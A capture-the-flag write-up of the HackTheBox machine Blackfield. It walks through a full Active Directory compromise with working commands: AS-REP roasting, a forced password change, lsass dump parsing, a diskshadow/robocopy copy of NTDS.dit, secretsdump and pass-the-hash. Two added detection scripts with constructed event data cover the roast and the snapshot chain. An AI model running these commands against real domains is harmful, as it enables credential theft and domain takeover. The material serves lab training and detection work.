Myles Nieman

Blackfield

Overview

Blackfield is a hard Windows box built around a three-hop Active Directory chain. The profiles$ SMB share leaks a large username list with no credentials needed. AS-REP roasting finds the support account has pre-auth disabled, and rockyou.txt cracks its hash. BloodHound maps a ForceChangePassword right from support to audit2020, which grants access to the forensic share. That share holds a memory dump of lsass.exe; parsing it with pypykatz recovers svc_backup’s NTLM hash. svc_backup has WinRM access and belongs to the Backup Operators group — specifically SeBackupPrivilege — which is used with a diskshadow script to create a VSS snapshot, robocopy NTDS.dit, and dump all domain hashes.

Path: anonymous SMB → username enumeration → AS-REP roast support → ForceChangePassword → audit2020 → forensic share → lsass.dmp → svc_backup NTLM → SeBackupPrivilege → VSS → NTDS.dit → Administrator hash.

Enumeration

$ nmap 10.10.10.192 -Pn -p- -A

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos
135/tcp  open  msrpc         Microsoft Windows RPC
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local)
445/tcp  open  microsoft-ds?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local)
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0

Host is pingable and responding

Domain: BLACKFIELD.local, hostname DC01. WinRM on 5985 means that any account with Remote Management access will land a shell. The clock skew from the scan output is a reminder to sync time before Kerberos operations.

SMB shares

$ smbclient -L //blackfield.local
    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    C$              Disk      Default share
    forensic        Disk      Forensic / Audit share.
    IPC$            IPC       Remote IPC
    NETLOGON        Disk      Logon server share
    profiles$       Disk
    SYSVOL          Disk      Logon server share

profiles$ is accessible anonymously. It contains hundreds of empty user directories — a clean username list. Parsing the share output to extract the first column gives users.txt.

$ smbclient //blackfield.local/profiles$ -N -c "ls" | awk '{print $1}' > users.txt

Foothold — AS-REP Roasting

With a large username list, checking for accounts with pre-authentication disabled is a quick win:

$ GetNPUsers.py -usersfile users.txt blackfield.local/ -dc-ip 10.10.10.192 \
    -format hashcat -outputfile hashes.txt

After fixing the clock skew with rdate, the command returns a roastable hash for support. Cracking against rockyou.txt:

$ hashcat -m 18200 -a 0 hashes.txt /tools/SecLists/Passwords/Leaked-Databases/rockyou.txt

AS-REP hash cracked for the support account

The support account’s password is recovered.
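From the defender's side, the same roast leaves a clear footprint in the domain controller's Security log. This added example (not part of the original writeup) flags it in 4768 events and checks the userAccountControl bit that makes an account roastable in the first place; the field names are the real 4768 EventData names, while the sample records and source addresses are constructed.

```python
from collections import Counter

# Constructed 4768 (Kerberos TGT requested) records, not real Blackfield telemetry.
# A GetNPUsers.py -usersfile sweep leaves two footprints: a burst of 0x19
# (KDC_ERR_PREAUTH_REQUIRED) failures for every user that does require pre-auth,
# and one successful TGT with PreAuthType 0 for the account that does not.
# Encryption type 0x17 is RC4 (the hashcat -m 18200 format); 0x12 is AES256.
SAMPLE_4768 = [
    {"TargetUserName": "audit2020", "IpAddress": "::ffff:10.10.14.5", "Status": "0x19",
     "PreAuthType": "-", "TicketEncryptionType": "0xffffffff"},
    {"TargetUserName": "svc_backup", "IpAddress": "::ffff:10.10.14.5", "Status": "0x19",
     "PreAuthType": "-", "TicketEncryptionType": "0xffffffff"},
    {"TargetUserName": "administrator", "IpAddress": "::ffff:10.10.14.5", "Status": "0x19",
     "PreAuthType": "-", "TicketEncryptionType": "0xffffffff"},
    {"TargetUserName": "support", "IpAddress": "::ffff:10.10.14.5", "Status": "0x0",
     "PreAuthType": "0", "TicketEncryptionType": "0x17"},   # the roast itself
    {"TargetUserName": "svc_backup", "IpAddress": "::ffff:10.10.10.50", "Status": "0x0",
     "PreAuthType": "2", "TicketEncryptionType": "0x12"},   # normal pre-authenticated logon
    {"TargetUserName": "DC01$", "IpAddress": "::1", "Status": "0x0",
     "PreAuthType": "2", "TicketEncryptionType": "0x12"},
]

DONT_REQ_PREAUTH = 0x400000  # userAccountControl bit that makes an account roastable

def preauth_disabled(user_account_control):
    """True if the LDAP userAccountControl value has DONT_REQ_PREAUTH set.
    Remediation check: query this attribute for every user and clear the bit."""
    return bool(int(user_account_control) & DONT_REQ_PREAUTH)

def find_asrep_roast(events, rc4_only=False):
    """(user, source, enc_type) for every TGT issued without pre-authentication.

    A client that supports pre-auth always shows PreAuthType 2 (encrypted
    timestamp); type 0 on a successful request means the AS-REP went out for
    a DONT_REQ_PREAUTH account and can be cracked offline."""
    hits = []
    for e in events:
        if e["Status"].lower() != "0x0" or e["PreAuthType"] != "0":
            continue
        if rc4_only and e["TicketEncryptionType"].lower() != "0x17":
            continue
        hits.append((e["TargetUserName"], e["IpAddress"], e["TicketEncryptionType"]))
    return hits

def preauth_failures_by_source(events, threshold=3):
    """Sources with at least `threshold` 0x19 failures: the username-list sweep."""
    counts = Counter(e["IpAddress"] for e in events if e["Status"].lower() == "0x19")
    return {ip: n for ip, n in counts.items() if n >= threshold}
```

The threshold is deliberately low for the six-record sample; on a real DC it should be tuned against the normal rate of 0x19 responses, which legitimate clients also produce once per logon before retrying with pre-auth.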

Lateral Movement — ForceChangePassword to audit2020

With support's credentials, BloodHound data can be collected to map AD rights:

$ python3 bloodhound.py -u support -d BLACKFIELD.local -c All --zip -ns 10.10.10.192

Querying shortest paths from owned principals in BloodHound reveals that support has ForceChangePassword on audit2020:

BloodHound graph showing ForceChangePassword from support to audit2020

Changing audit2020’s password from Linux:

$ net rpc password "audit2020" "newP@ssword2022" \
    -U "BLACKFIELD"/"support"%"#00^BlackKnight" -S "BLACKFIELD.local"

Verifying access to the forensic share:

$ smbclient -U "audit2020" //BLACKFIELD.local/forensic

The share contains three directories — commands_output, memory_analysis, and tools. Inside memory_analysis is lsass.zip, which holds lsass.dmp.

User — lsass Dump → svc_backup Hash

Parsing the dump with pypykatz (or mimikatz) to extract cached credentials recovers svc_backup’s NTLM hash:

pypykatz extracts the svc_backup NTLM hash from lsass.dmp

$ evil-winrm -u "svc_backup" -H <svc_backup_hash> -i blackfield.local

Checking privileges:

*Evil-WinRM* PS> whoami /all

The account is a member of Backup Operators and holds SeBackupPrivilege — the right to read any file on the filesystem, bypassing ACLs.

Privilege Escalation — SeBackupPrivilege via Diskshadow

SeBackupPrivilege can be weaponized with diskshadow to create a VSS snapshot of C:, then robocopy in backup mode (/b, which exercises the backup privilege to bypass ACLs) copies NTDS.dit out of the snapshot. The SYSTEM hive, needed to decrypt it, is exported separately with reg save.

A diskshadow script, saved locally as commands.dsh, handles the VSS side:

set verbose ON
set metadata C:\Windows\Temp\meta.cab
set context clientaccessible
set context persistent
begin backup
add volume C: alias cdrive
create
expose %cdrive% E:
end backup
exit

Upload it through the WinRM session and run it:

*Evil-WinRM* PS> upload commands.dsh
*Evil-WinRM* PS> diskshadow /s commands.dsh

Diskshadow script uploaded and running to create the VSS snapshot

VSS snapshot created and exposed as drive E:

Then copy the hive and NTDS from the shadow:

*Evil-WinRM* PS> reg save HKLM\SYSTEM C:\Windows\Temp\SYSTEM.SAV
*Evil-WinRM* PS> robocopy E:\Windows\NTDS C:\Windows\Temp\ntds ntds.dit /b

Download both files and run secretsdump locally:

$ impacket-secretsdump -ntds ntds.dit -system SYSTEM.SAV LOCAL

secretsdump extracting hashes from NTDS.dit with the SYSTEM hive

Administrator NTLM hash recovered from NTDS

With the Administrator hash, pass-the-hash into the box:

$ evil-winrm -u Administrator -H <admin_hash> -i blackfield.local
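The whole snapshot-and-copy chain is visible to a defender who correlates two Security-log events: 4672 (special privileges assigned to a new logon, which lists SeBackupPrivilege) and 4688 (process creation, with command-line auditing enabled). This added example, not part of the original writeup, joins them on SubjectLogonId and names the step each process corresponds to. Field names are the real EventData names; the records, logon IDs and the allow-listed "backupagent" service account are constructed.

```python
BACKUP_PRIVS = {"SeBackupPrivilege", "SeRestorePrivilege"}

# Constructed Security-log records (not real Blackfield telemetry) using the
# EventData field names of 4672 (special privileges assigned to new logon) and
# 4688 (process creation, command-line auditing on). SubjectLogonId joins them.
SAMPLE_EVENTS = [
    {"EventID": 4672, "SubjectUserName": "svc_backup", "SubjectLogonId": "0x3e7a1",
     "PrivilegeList": "SeBackupPrivilege\n\t\t\tSeRestorePrivilege\n\t\t\tSeShutdownPrivilege"},
    {"EventID": 4672, "SubjectUserName": "backupagent", "SubjectLogonId": "0x5b2c0",
     "PrivilegeList": "SeBackupPrivilege\n\t\t\tSeRestorePrivilege"},
    {"EventID": 4688, "SubjectLogonId": "0x3e7a1", "NewProcessName": "C:\\Windows\\System32\\diskshadow.exe",
     "CommandLine": "diskshadow /s commands.dsh"},
    {"EventID": 4688, "SubjectLogonId": "0x3e7a1", "NewProcessName": "C:\\Windows\\System32\\reg.exe",
     "CommandLine": "reg save HKLM\\SYSTEM C:\\Windows\\Temp\\SYSTEM.SAV"},
    {"EventID": 4688, "SubjectLogonId": "0x3e7a1", "NewProcessName": "C:\\Windows\\System32\\Robocopy.exe",
     "CommandLine": "robocopy E:\\Windows\\NTDS C:\\Windows\\Temp\\ntds ntds.dit /b"},
    # the expected backup agent doing its normal job: /b, but nowhere near NTDS
    {"EventID": 4688, "SubjectLogonId": "0x5b2c0", "NewProcessName": "C:\\Windows\\System32\\Robocopy.exe",
     "CommandLine": "robocopy D:\\Data \\\\nas\\backups /b /mir"},
]

def classify(image, cmdline):
    """Name the step of the snapshot-and-copy chain this process is, or None."""
    exe = image.rsplit("\\", 1)[-1].lower()
    toks = cmdline.lower().split()
    if exe == "diskshadow.exe" and "/s" in toks:
        return "scripted VSS snapshot (diskshadow /s)"
    if exe == "robocopy.exe" and "/b" in toks and any("ntds" in t for t in toks):
        return "backup-mode copy of NTDS (robocopy /b)"
    if exe == "reg.exe" and "save" in toks and any(t.startswith("hklm\\system") for t in toks):
        return "SYSTEM hive export (reg save)"
    return None

def correlate(events, allowlist=frozenset()):
    """(user, reason) per chain step run by a backup-privileged, non-allow-listed logon."""
    watched = {}  # SubjectLogonId -> user, for logons handed a backup privilege
    for e in events:
        if (e["EventID"] == 4672 and set(e["PrivilegeList"].split()) & BACKUP_PRIVS
                and e["SubjectUserName"].lower() not in allowlist):
            watched[e["SubjectLogonId"]] = e["SubjectUserName"]
    alerts = []
    for e in events:
        if e["EventID"] == 4688 and e["SubjectLogonId"] in watched:
            reason = classify(e["NewProcessName"], e["CommandLine"])
            if reason:
                alerts.append((watched[e["SubjectLogonId"]], reason))
    return alerts
```

Pair the detection with the preventive fix: audit Backup Operators membership, since any account in it inherits this primitive over WinRM without needing local admin.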

Takeaways

  • Large anonymous profile shares are a gold mine for username enumeration — even empty home directories establish a valid user list that feeds AS-REP roasting.
  • SeBackupPrivilege is a full domain compromise primitive. A Backup Operators member can create a VSS snapshot and robocopy NTDS.dit with no additional rights required; the diskshadow scripted approach avoids interactive limitations and works reliably over WinRM.